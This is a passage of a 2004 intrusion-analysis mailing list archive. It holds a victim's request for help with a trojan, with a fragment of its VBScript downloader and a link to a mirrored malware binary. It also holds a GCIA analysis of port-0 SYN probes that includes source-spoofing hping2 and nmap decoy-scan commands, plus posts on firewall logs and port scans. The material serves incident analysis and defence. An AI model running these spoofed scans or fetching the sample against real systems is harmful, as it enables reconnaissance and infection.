sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "lsassvc.exe",2 The lsassvc.exe is still on angelfire's web server, and I mirrored it here : http://www.cybergeneration.com/security/2004.07.08/lsassvc.ex_ This file is bound to TCP port 753, and a connection on this port output this : 220 jsdaus Microsoft FTP Service (Version 5.0) Looks like a "special" FTP service. The program answers my "USER" and "PASS" commands : > USER test < 331 Password required for test. > PASS test < 530 Login incorrect. It is also bound on a service name "Local Security Authority Service System". Norton says this file is not infected, but it looks really suspicious, we already shut down the server for analysis. It has been used for scanning. Other hack tools have been found under C:\RECYCLER\speedy. I'd like to know which kind of trojan it is, and if it has self-propagating behavior like some Ago-Gaobot. Thx for any help Maxime Ducharme Programmeur / Sp?cialiste en s?curit? r?seau From lindsay at issecurity.co.za Fri Jul 9 14:05:48 2004 From: lindsay at issecurity.co.za (Lindsay van Eden) Date: Fri, 09 Jul 2004 16:05:48 +0200 Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Lindsay van Eden Message-ID: <40EEA63C.5070106@issecurity.co.za> Network Detect 1 - TCP Destination Port 0 [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**] [Classification: Misc activity] [Priority: 3] 07/16-19:11:40.464488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42 211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ******S* Seq: 0xADA02A9A Ack: 0x0 Win: 0x16D0 TcpLen: 32 TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0 07/16-19:11:40.464488 211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ******S* Seq: 0xADA02A9A Ack: 0x0 Win: 0x16D0 TcpLen: 32 TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0 1. Source of Trace The raw log analyzed within this section was obtained from http://www.incidents.org/logs/raw/2002.6.16, with the following actions taken in determining the network layout, source and type of attack. Viewing of trace file and overview of expressions used: tcpdump -neqr 2002.6.16 -c 2 02:05:05.884488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 294: 61.83.144.42.1463 > 46.5.180.133.http: tcp 240 (DF) 02:05:06.874488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 419: 61.83.144.42.1467 > 46.5.180.133.http: tcp 365 (DF) tcpdump -ner 2002.6.16 |more 02:05:05.884488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 294: 61.83.144.42.1463 > 46.5.180.133.http: P 3698072451:3698072691(240) ack 3357659451 win 16824 (DF) 02:05:06.874488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 419: 61.83.144.42.1467 > 46.5.180.133.http: P 3698689090:3698689455(365) ack 3351137157 win 17520 (DF) -n No name resolution. -e Print link-level header on each dump line. -q Quick output. -r Read packets from file -c Count Captured MAC addresses: tcpdump -ner 2002.6.16 |gawk '{print $2}' |sort -u 0:0:c:4:b2:33 0:3:e3:d9:26:c0 cut -d Remove delimitated sections from each line sort Sort lines from output gawk '{print$2}' Pattern scanning and printing of second variable. OUI Registration: http://standards.ieee.org/cgi-bin/ouisearch 00-03-E3 (hex) Cisco Systems, Inc. 0003E3 (base 16) Cisco Systems, Inc. 00-00-0C (hex) CISCO SYSTEMS, INC. 00000C (base 16) CISCO SYSTEMS, INC. Associated addresses of MAC 0:3:e3:d9:26:c0: tcpdump -neqr 2002.6.16 ether src 0:3:e3:d9:26:c0 |awk '{print $5}' |sort -u 12.107.51.109.http 12.36.134.2.http 128.102.196.25.39572 128.167.120.16.http 128.242.213.251.http 129.186.1.198.ftp-data 12.96.216.4.8276 134.180.228.45.44326 Traffic going to MAC 0:3:e3:d9:26:c0: tcpdump -neqr 2002.6.16 ether src 0:3:e3:d9:26:c0 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u 46.5.0.245 46.5.100.65 46.5.101.240 46.5.102.170 46.5.10.23 46.5.103.183 46.5.104.38 46.5.110.39 tcpdump -neqr 2002.6.16 ether src 0:3:e3:d9:26:c0 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u | wc -l 142 Associated addresses of MAC 0:0:c:4:b2:33: tcpdump -neqr 2002.6.16 ether dst 0:0:c:4:b2:33 |awk '{print $7}' |sort -u 46.5.0.245.http: 46.5.100.65.printer: 46.5.101.240.http: 46.5.102.170.domain: 46.5.10.23.printer: 46.5.103.183.domain: 46.5.104.38.http: 46.5.110.39.http: 46.5.11.16.printer: 46.5.113.74.http: 46.5.113.85.http: Traffic going to MAC 0:0:c:4:b2:33 tcpdump -neqr 2002.6.16 ether src 0:0:c:4:b2:33 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u 12.232.96.61 12.252.53.145 12.5.136.100 130.166.151.185 134.96.234.34 141.35.14.47 146.145.124.89 156.143.35.241 159.43.254.50 194.225.40.7 194.67.23.251 194.67.35.196 195.209.49.241 tcpdump -neqr 2002.6.16 ether src 0:0:c:4:b2:33 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u | wc -l 99 Based on the above findings, it would seem that 0:0:c:4:b2:33 has a consistent /16 range of addresses associated to it, while 0:3:e3:d9:26:c0 has a number of inconsistent or random addresses. Thus I conclude that the 46.5.0.0/16 network is the monitored range with the latter being external. Un-trusted Network------External Cisco Device----|-------- Perimeter Cisco Device--------Monitored Network 0:3:e3:d9:26:c0 | 0:0:c:4:b2:33 | Snort While reviewing the type of traffic captured, I noticed an interesting port and subsequently determined it was an incoming Syn to destination port 0: tcpdump -nnr 2002.6.16 | awk '{print $2 "\n"$4}' | awk -F \. '{print $5}' | awk -F : '{print $1}' | sort -u | awk '{if ($1<=1023) print $1}' 0 20 21 443 515 53 80 tcpdump -ner 2002.6.16 dst port 0 19:11:40.464488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF) 19:11:43.444488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF) 19:11:49.354488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF) 19:12:01.534488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF) 2. Detect was generated by: The raw log was read by Snort Version 2.1.3.RC1 (Build 26), rules last modified June 19, 2004. No changes where made to the snort.conf file other than specifying the HOME_NET as 46.5.0.0/16. Alerts where generated with the following variables: snort -c snort.conf -dek none -r 2002.6.16 -l snortdump -q -c Use Rules File -d Dump the Application Layer -e Display the second layer header info -k Checksum mode (all,noip,notcp,noudp,noicmp,none) -r Read and process tcpdump file -l Log to directory -q Quiet. Don't show banner and status report [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**] [Classification: Misc activity] [Priority: 3] 07/16-19:11:40.464488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42 211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ******S* Seq: 0xADA02A9A Ack: 0x0 Win: 0x16D0 TcpLen: 32 TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0 [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**] [Classification: Misc activity] [Priority: 3] 07/16-19:11:43.444488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42 211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ******S* Seq: 0xADA02A9A Ack: 0x0 Win: 0x16D0 TcpLen: 32 TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0 [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**] [Classification: Misc activity] [Priority: 3] 07/16-19:11:49.354488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42 211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ******S* Seq: 0xADA02A9A Ack: 0x0 Win: 0x16D0 TcpLen: 32 TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0 Explanation of alert: [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**] Snort ID or SID and message [Classification: Misc activity] [Priority: 3] Classification and Severity 07/16-19:11:49.354488 Date and time of alert 0:3:E3:D9:26:C0 Source MAC address 0:0:C:4:B2:33 Destination MAC address type:0x800 Encapsulating protocol Type IP len:0x42 Length of frame 66 Bytes 211.47.255.22 Source address 40844 Source port 46.5.214.181 Destination address 0 Destination port TCP Protocol type TCP TTL:47 IP Time to live TOS:0x0 IP type of service ID:0 IP Identification value IpLen:20 IP Header length DgmLen:52 Total datagram length DF Do not fragment bit set ******S* SYN flag set Seq: 0xADA02A9A Hex Sequence Number Ack: 0x0 Ack not set Win: 0x16D0 Window Size 5840 TcpLen: 32 TCP header length TCP Options (6) 6 TCP options set => MSS: 1460 Maximum Segment Size NOP NOP No operation SackOK Selective Ack permitted NOP No operation WS: 0 Window scale 0 The following rule generated SID number 524, which can be found under $Snort/rules/bad-traffic.rules. SID 524 documentation can be viewed at http://www.snort.org/snort-db/sid.html?sid=524 SID 524 Message BAD-TRAFFIC tcp port 0 traffic Signature alert tcp $EXTERNAL_NET any <> $HOME_NET 0 (msg:"BAD-TRAFFIC tcp port 0 traffic"; flow:stateless; classtype:misc-activity; sid:524; rev:8;) As TCP port 0 is an invalid destination port normally indicating reconnaissance type activity, and in more serious cases, system compromise, any traffic with a destination port of 0 will generate the alarm and should be regarded as suspicious. 3. Probability the source address was spoofed: The use of Hping's default setting to port 0 has been mentioned in previous discussions (3). However, the evidence contained within this log file alone is simply not enough to conclusively determine the validity of host 211.47.255.22. A dig -x 211.47.255.22 reports that the range is assigned to Korea Network Information Center. A small concern as many individuals believe that servers based in Korea and China are most frequently used in attacks. <<>> DiG 9.2.1 <<>> -x 211.47.255.22 ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 22506 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;22.255.47.211.in-addr.arpa. IN PTR ;; AUTHORITY SECTION: 47.211.in-addr.arpa. 10708 IN SOA ns.krnic.net. domain.krnic.net. 2004060716 21600 900 604800 43200 Unfortunately, a 'dig any' reported the same information and would appear that the IP address currently has no further records. There are a number of ways in which this attack could play out with the following three scenarios likely candidates. Of course they remain unconfirmed as the log file is generated by a pre-defined set of rules unbeknownst to myself. * Scenario 1 Spoofed: Denial of Service My first assumption when reviewing the type of traffic would be that the source address is in-fact spoofed and perhaps part of a denial of service attack. Initial response would be to verify that 211.47.255.22 is not a customer network, remote branch, user or business critical site. The reason being that an Hping Syn connect to port 0 is so blatantly obvious that any IPS/NIDS would possibly have shunned this network/host, thus preventing a legitimate service. I was unable to find any other traffic within this log file, to or from the source address or range that could verify the legitimacy of the source. Thus leading into the next possible scenario... * Scenario 2 Spoofed: Reconnaissance Decoy As previously mentioned, a Syn connect to port 0 would just about set off any NIDS alarm, alerting the firewall admin and IT staff. If an attacker, assuming they knew what they where doing, where using hping for host and network fingerprinting, it is very unlikely they would use the default port zero while purposely setting the Syn flag as any hope of remaining undetected would be futile. hping2 -S -a 211.47.255.22 46.5.214.181 -j HPING 46.5.214.181 (eth0 46.5.214.181): S set, 40 headers + 0 data bytes A typical response to this type of activity would be to review any "out of state" packets logged, assuming a stateful firewall where part of the perimeter defenses and Syn connect floods as more than likely, the real source IP address would be among them. i.e. Nmap Hide Scan: * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys ? Scenario 3 IP ID Sequencing The source address could either be spoofed (zombie) or a legitimate host. The attacker sends a Syn request to port 0 hoping for reset packet, thus obtaining the IPID Sequence Generation information needed for session hi-jacking and OS fingerprinting. 4. Description of attack: This appears to be more reconnaissance activity than an attack. TCP Syn packets are sent from 211.47.255.22 with random source ports to host 46.5.214.181, destination port 0. Typical characteristics of an idle host scan, provided the attacker receives a RST or ACK packet, as mentioned is scenario 3. Why destination Port 0 in particular is targeted is still unclear as any standard firewall or access-controlled router should be configured to drop connections to port 0, unless the attackers goal where to obtain information on the router access lists or firewall policy based on returned reject packets. A shot in the dark, however vague is that the traffic is an attempted random exploit of the vulnerability found in Xfree86, Fedora Core 1 and 2. The vulnerability could allow attackers to gain remote access via Xdm, on random TCP sockets but remains unlikely due to the affected versions, release dates and current rule files. CVE under review: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0419: "XDM in XFree86 opens a chooserFd TCP socket even when DisplayManager.requestPort is 0, which could allow remote attackers to connect to the port, in violation of the intended restrictions." Replicating the scan with Hping: Original packet: 19:13:25.404488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.42091 > 46.5.214.181.0: S 3000316664:3000316664(0) win 5840 (DF) 19:13:37.454488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.42091 > 46.5.214.181.0: S 3000316664:3000316664(0) win 5840 (DF) Possible hping variables used: -s --baseport base source port -y --dontfrag set do not fragment flag -o --tos type of service -w window size set window size -S syn flag set syn flag -a spoof source spoof source address -H --ipproto set the IP protocol field, only in RAW IP mode -0 --rawip RAW IP mode -d --data data size [root at fluffybunny lindsay]# hping2 -w 5840 -S -a 211.47.255.22 46.5.214.181 HPING 46.5.214.181 (eth0 46.5.214.181): S set, 40 headers + 0 data bytes Captured file on localhost: [root at fluffybunny lindsay]# tcpdump -ner hping host 46.5.214.181 15:37:39.916038 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.22.1442 > 46.5.214.181.0: S 1421001844:1421001844(0) win 5840 15:37:40.909743 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.22.1443 > 46.5.214.181.0: S 741291124:741291124(0) win 5840 Sample Debug to localhost: [root at fluffybunny lindsay]# hping2 -S -D -V 127.0.0.1 DEBUG: Output interface address: 1.148.0.64 DEBUG: if lo: OK using lo, addr: 127.0.0.1, MTU: 16436 DEBUG: Trying to open PF_PACKET socket... DEBUG: PF_PACKET, SOCK_RAW open OK HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes 45 00 00 28 65 F3 00 00 40 06 00 00 7F 00 00 01 7F 00 00 01 08 0A 00 00 6B 57 AA 5F 5A 22 BB FF 50 02 02 00 7B FD 00 00 len=40 ip=127.0.0.1 ttl=64 DF id=0 tos=0 iplen=40 sport=0 flags=RA seq=0 win=0 rtt=0.3 ms seq=0 ack=1800907360 sum=c94 urp=0 45 00 00 28 F6 41 00 00 40 06 00 00 7F 00 00 01 7F 00 00 01 08 0B 00 00 66 B3 BE 2E 05 15 EC 87 50 02 02 00 91 56 00 00 len=40 ip=127.0.0.1 ttl=64 DF id=0 tos=0 iplen=40 sport=0 flags=RA seq=1 win=0 rtt=0.3 ms seq=0 ack=1723055663 sum=e084 urp=0 5. Attack mechanism: Like any other reconnaissance activity, an attempted idle session or fingerprint scan would notify the network admin that a potentially malicious host is gathering information about their network layout, type of operating systems, services and most importantly, could be a prelude to an attack. Based on the same three scenarios previously mentioned, the attack mechanisms would be: Scenario 1: Spoofed - Denial of Service An attacker intent on stopping legitimate services could easily achieve their goal by deploying a denial of service or distributed denial of service attack on the targeted host or network, flooding their site with packets, utilizing their entire bandwidth allocation or causing a site crash. However, Internet Service Providers as well as vendors have become more affluent at minimizing the impact of the more common attacks such as teardrop, smurf, fragment and syn floods. As such, an alternative or at least a more creative way to cause a denial of service is using the target networks own IDS system against them, by setting off an alarm and causing the sensor to block or shun the source address range of a legitimate service. Basically, the attacker sends a spoofed packet to destination port zero, source address the target network. The crafted packet to destination port zero has a known IDS signature, which notifies the sensor management, in turn, shunning the network host from any other attempted connections for a user defined period of time. For this type of attack to be truly effective would require the attacker to have done their homework, in the sense of reconnaissance. They would have to be completely sure that IP address 211.47.255.22, possibly a natted firewall IP requires business critical access to the 46.5.214.181 host/network. I remain skeptical about the likelihood of this scenario as I was unable to find any correlation within the existing logs, nor verify source address as a legitimate host or site. Scenario 2: Spoofed Reconnaissance Decoy Due to the sheer blatancy of the attack, my next assumption is that it is part of a reconnaissance decoy. The administrators would be so busy monitoring the type of traffic coming from the source address range or to destination port 0, the actual reconnaissance activity would go unnoticed. Hping's use of random source addresses or nmap's use of decoys: Hping --rand-source random source address mode. Nmap -Ddecoy nmap -v -sS -O -D211.47.255.22,211.47.255.21,211.47.255.20 46.5.214.181 Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Host (46.5.214.181) appears to be up ... good. Initiating SYN Stealth Scan against (46.5.214.181) caught SIGINT signal, cleaning up tcpdump -ner log host 46.5.214.181 12:03:03.489233 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.22 > 46.5.214.181: icmp: echo request 12:03:03.489338 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.21 > 46.5.214.181: icmp: echo request 12:03:03.489632 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.21 > 46.5.214.181: icmp: echo request 12:03:03.489814 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.20 > 46.5.214.181: icmp: echo request 12:03:03.489908 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.22.39975 > 46.5.214.181.http: . ack 711052103 win 2048 12:03:03.489971 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: real.ip.host.39975 > 46.5.214.181.http: . ack 711052103 win 2048 12:03:03.490031 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.21.39975 > 46.5.214.181.http: . ack 711052103 win 2048 12:03:03.490091 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.20.39975 > 46.5.214.181.http: . ack 711052103 win 2048 Unfortunately, there is no true means to conclusively justify this scenario as there would ultimately appear to be no correlation of packets or data. Scenario 3: IP ID sequencing As port 0 is an illegitimate service, a Syn connect to port 0 on the target host will cause it to respond with a Rst packet, provided the target host is not protected by a firewall of some sort. A way of identifying an IP ID increment with Nmap for example is to first identify a 'zombie' (1) host. I.e. Zombie Host A. By sending a SYN-ACK packet to the zombie, the host will respond with a RST packet, taking note of the IP ID sequence number, i.e. 30001. Next, the attacker sends a spoofed packet with source address of Zombie Host A, target host responding with a RST. The attacker than sends another SYN-ACK to the zombie host, receiving a RST with IP ID sequence number 30002, indicating that the port is closed, with an IP ID increment of +1. A very simple reconnaissance technique with tools Nmap and Hping (2), which is the most likely out of all three scenarios. 6. Correlations: One of the earliest accounts of IP ID idle host scanning was first recorded by a Salvatore Sanfilippo way back in December of 1998. Originally posted to the bugtraq mailing list, followed by the author of Nmap, Fyodors paper on Idle host scanning, released September of 2002. http://www.insecure.org/nmap/idlescan.html http://wiki.hping.org/8 Numerous forums and vendors have published paper, articles and discussions citing the threat associated to idle host scans. Ultimately referring back to the original posting of Fyodor. GCIA students making reference to Port 0 idle host scans include Jason B Anderson, Version 3.2 Detects. http://www.dshield.org/pipermail/intrusions/2002-October/005735.php Barbara Morgan, Version 3.2 Detects http://www.dshield.org/pipermail/intrusions/2002-September/005400.php Patrick Patenaude, Version 3.3 Detects http://www.dshield.org/pipermail/intrusions/2003-April/007432.php 7. Evidence of active targeting: Captured in the 2002.6.16 log file is the same single host IP of 211.47.255.22, which initiated it's scan at 19:11:40.464488, consistent destination IP address of 46.5.214.181, ending at 19:13:37.454488. This would at first appear to indicate active targeting, however, can not verify a known exploit while at the same time could be part of a larger network slow scan. To further substantiate my findings, I decided to review the logs from 2002.6.15, as well as 2002.6.17. Logs - 2002.6.15 211.47.255.23 > 46.5.84.109 Started at 06:35:41.514488 Ended at 06:37:38.514488 211.47.255.22 > 46.5.227.153 Started at 17:16:12.164488 Ended at 17:18:09.164488 211.47.255.22 > 46.5.106.99 Started at 23:29:10.964488 Ended at 23:31:07.914488 Logs - 2002.6.17 211.47.255.21 > 46.5.29.60 Started at 07:43:56.674488 Ended at 07:45:53.674488 211.47.255.24 > 46.5.107.136 Started at 08:27:27.874488 Ended at 08:29:24.874488 211.47.255.24 > 46.5.15.88 Started at 15:01:06.604488 Ended at 15:03:03.604488 This to me would indicate a slow scan using addresses from the same source address allocation to random destination addresses, all within the 46.5/16 range. 8. Severity: Severity = (criticality + lethality) - (system countermeasures + network countermeasures) (2+3) - (2+4) = 0 Scale of 1 to 5 - 1 being the lowest, 5 being the highest. Criticality = 2 The purpose of the destination address 46.5.214.181 is unknown, nor is there any other traffic destined to the IP on any other ports. As such, a conservative value of 2 has been assigned. Lethality = 4 While most often considered reconnaissance activity and not of great lethality, network and host mapping could be a prelude to a later attack. More importantly, IPID sequencing or even the possibility that the machine has in fact already been compromised. Unauthorized network use. System countermeasures = 2 Although no return traffic was seen in the log file, by default, a host will respond to a TCP port 0 SYN connection with a RST ACK, which is after all the nature of TCP/IP. So unless a personal firewall where installed, the host would indeed respond. Network countermeasures = 4 As previously mentioned, no return traffic was seen so assume that there is a packet filtering device or firewall protecting the host in question. 9. Defensive recommendations: Thankfully, most firewalls drop anything that is not explicitly permitted. So, provided one's firewall is configured correctly, there should be nothing to worry about. Unfortunately, this is not a perfect world and any firewall, router or packet-filtering device is only as strong as the policy it enforces. A "permit any any", which, believe it or not, is seen far to often would certainly NOT protect against an attack, little alone this type of reconnaissance activity. Defence in depth can easily be achieved just by using the existing hardware we are already aware of, which are two Cisco Devices. Assuming one of which is a router, it is more than likely owned by the service provider or Telco. My first point of action would be to request the addition of very basic access lists. For example, implementing bogon routing (5) and RFC 1918 (4) if not already implemented, which any first tier service provider would do. Thus reducing the use of bandwidth by unnecessary scans, spoofed addresses and general broadcasts etc. Next, securing the customer side router with basic filtering similar to that as configured on the perimeter firewall. Depending on the current load, perhaps even updating the code with support for the IOS firewall feature set / CBAC. I.e. Any incoming domain transfers be dropped and logged etc. An excellent reference would be the National Security Agency's Securing Cisco Routers Guide (6) ip access-list extended [linetag]-access-filters ! deny udp any any eq 69 deny udp any any eq 111 deny udp any any eq 2049 deny udp any any eq 31337 ! default backorifice port permit udp any any deny tcp any eq 20 any eq 2049 deny tcp any eq 20 any range 6000 6004 permit tcp any eq 20 any gt 1023 permit tcp any any gt 1023 established ! 10. Multiple choice test question: 15:01:32.949207 0:c0:4f:2a:a:1b 0:2:a5:28:8b:fe ip 54: HOSTA.2407 > HOSTB.8080: SF 275897171:275897171(0) win 512 15:01:32.949353 0:2:a5:28:8b:fe 0:c0:4f:2a:a:1b ip 60: HOSTB.8080 > HOSTA.2407: S 3625528744:3625528744(0) ack 275897172 win 57344 (DF) 15:01:32.949427 0:c0:4f:2a:a:1b 0:2:a5:28:8b:fe ip 54: HOSTA.2407 > HOSTB.8080: R 275897172:275897172(0) win 0 (DF) What is wrong with the above connection with the greatest cause for concern? A) Destination port 8080 is indicative of a backdoor Trojan. The host has become infected as it is acknowledging the connection attempt, data has been compromised. B) Both Syn and Fin flags are set, which should never occur under normal TCP connection attempts. Possible cause for alarm is the bypassing of stateful firewalls. C) HOSTA is not listening on port 2047, which resets the connection, preventing a legitimate service. Answer: B While A is not entirely impossible, there are legitimate services such as proxy services which runs on port 8080 while a Syn and Fin flag will never be set. From TEKenworthy at mar.med.navy.mil Fri Jul 9 14:06:17 2004 From: TEKenworthy at mar.med.navy.mil (Kenworthy, Thomas E. (CIV)) Date: Fri, 9 Jul 2004 10:06:17 -0400 Subject: [Intrusions] UDP port 137 packets being sent to Network and Broadcast addresse s Message-ID: <3462B20DF7B53644847EF43024736B1E036D3F78@marxchg04.mar.med.navy.mil> The log on the PIX firewall is being flooded with these errors. (see below) What is odd is that every day the network and broadcast addresses change, but our entire Class B eventually gets covered. This port 137 udp traffic is coming from valid secondary DNS servers running Microsoft DNS. The DNS servers are doing a NBTSTAT -a type of query to answer a reverse lookup DNS query. What we cannot figure out is why we would get queries to network addresses and broadcast addresses? The reverse lookup function is needed to authorize .mil clients to access .mil Web sites. We cannot block the port 137 queries or we loose this automatic function (which works fine for a valid IP) for thousands of computers across multiple Windows Domains. Because these secondary DNS servers are physically located in another location not under our control, we cannot get a capture of the full conversation. The IPs have been sanitized. The src outside is the DNS server and the dst inside is one of our network numbers. 2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.54.0/137 2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.0/137 2004-07-06 00:29:56 Local4.Error 10.10.34.49 Jul 05 2004 23:28:11: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.31/137 2004-07-06 00:31:19 Local4.Error 10.10.34.49 Jul 05 2004 23:29:33: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src DMZ:10.10.138.20/137 dst inside:10.10.34.48/137 Your thoughts would be greatly appreciated. Tom From pbrossman at healthplan.org Sat Jul 10 15:35:01 2004 From: pbrossman at healthplan.org (Phil Brossman) Date: Sat, 10 Jul 2004 11:35:01 -0400 Subject: [Intrusions] UDP port 137 packets being sent to Network and B roadcast addresse s Message-ID: Tom, I noticed something similar in my PIX log the other day. Take a look at it will you: 07-10-2004 11:31:26 Local5.Error 172.16.1.12 %PIX-3-305005: No translation group found for udp src inside:192.168.10.3/137 dst Outside:192.168.10.255/137 Is this the same as what you're seeing? Please keep me in the loop if you find out more. Thanks, Phil Brossman -----Original Message----- From: Kenworthy, Thomas E. (CIV) [mailto:TEKenworthy at mar.med.navy.mil] Sent: Friday, July 09, 2004 10:06 AM To: intrusions at lists.sans.org Subject: [Intrusions] UDP port 137 packets being sent to Network and Broadcast addresse s The log on the PIX firewall is being flooded with these errors. (see below) What is odd is that every day the network and broadcast addresses change, but our entire Class B eventually gets covered. This port 137 udp traffic is coming from valid secondary DNS servers running Microsoft DNS. The DNS servers are doing a NBTSTAT -a type of query to answer a reverse lookup DNS query. What we cannot figure out is why we would get queries to network addresses and broadcast addresses? The reverse lookup function is needed to authorize .mil clients to access .mil Web sites. We cannot block the port 137 queries or we loose this automatic function (which works fine for a valid IP) for thousands of computers across multiple Windows Domains. Because these secondary DNS servers are physically located in another location not under our control, we cannot get a capture of the full conversation. The IPs have been sanitized. The src outside is the DNS server and the dst inside is one of our network numbers. 2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.54.0/137 2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.0/137 2004-07-06 00:29:56 Local4.Error 10.10.34.49 Jul 05 2004 23:28:11: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.31/137 2004-07-06 00:31:19 Local4.Error 10.10.34.49 Jul 05 2004 23:29:33: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src DMZ:10.10.138.20/137 dst inside:10.10.34.48/137 Your thoughts would be greatly appreciated. Tom _______________________________________________ Intrusions mailing list Intrusions at lists.sans.org http://www.dshield.org/mailman/listinfo/intrusions From Ken.Connelly at uni.edu Sat Jul 10 16:35:51 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Sat, 10 Jul 2004 11:35:51 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LCAMMC8Q5W8YC47U@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 9 19:52:05 139.30.123.148:1817 -> xxx.yyy.1.1:1433 SYN ******S* Jul 9 19:52:08 139.30.123.148:1819 -> xxx.yyy.1.2:1433 SYN ******S* Jul 9 19:52:08 139.30.123.148:1821 -> xxx.yyy.1.3:1433 SYN ******S* Jul 9 19:52:08 139.30.123.148:1823 -> xxx.yyy.1.4:1433 SYN ******S* Jul 9 19:52:08 139.30.123.148:1825 -> xxx.yyy.1.5:1433 SYN ******S* Jul 9 19:52:08 139.30.123.148:1828 -> xxx.yyy.1.6:1433 SYN ******S* Jul 9 19:52:08 139.30.123.148:1830 -> xxx.yyy.1.7:1433 SYN ******S* Jul 9 19:52:05 139.30.123.148:1832 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 9 20:08:13 139.30.123.148:3597 -> xxx.yyy.255.249:1433 SYN ******S* Jul 9 20:08:13 139.30.123.148:3593 -> xxx.yyy.255.247:1433 SYN ******S* Jul 9 20:08:13 139.30.123.148:3599 -> xxx.yyy.255.250:1433 SYN ******S* Jul 9 20:08:13 139.30.123.148:3589 -> xxx.yyy.255.245:1433 SYN ******S* Jul 9 20:08:13 139.30.123.148:3595 -> xxx.yyy.255.248:1433 